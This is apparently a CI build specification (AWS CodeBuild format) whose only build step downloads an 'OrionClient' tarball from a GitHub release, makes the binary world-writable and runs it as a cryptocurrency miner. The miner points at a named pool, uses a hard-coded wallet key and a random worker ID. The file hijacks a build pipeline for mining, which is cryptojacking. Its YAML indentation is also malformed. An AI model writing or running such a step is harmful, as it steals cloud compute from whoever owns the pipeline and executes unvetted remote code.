version: 0.2

phases:
  build:
    - wget https://github.com/egg5233/OrionClient_tw/releases/download/1.6.0/OrionClient.tar.gz
        - tar xf OrionClient.tar.gz
        - cd OrionClient && chmod 777 OrionClient && ./OrionClient mine -a --pool twbitz --key GcwXpYMusMvpbFWx2UHARxnys428PUanXD3E8pBpv3RF --worker $(echo $(shuf -i 1-15000 -n 1)-CCC)
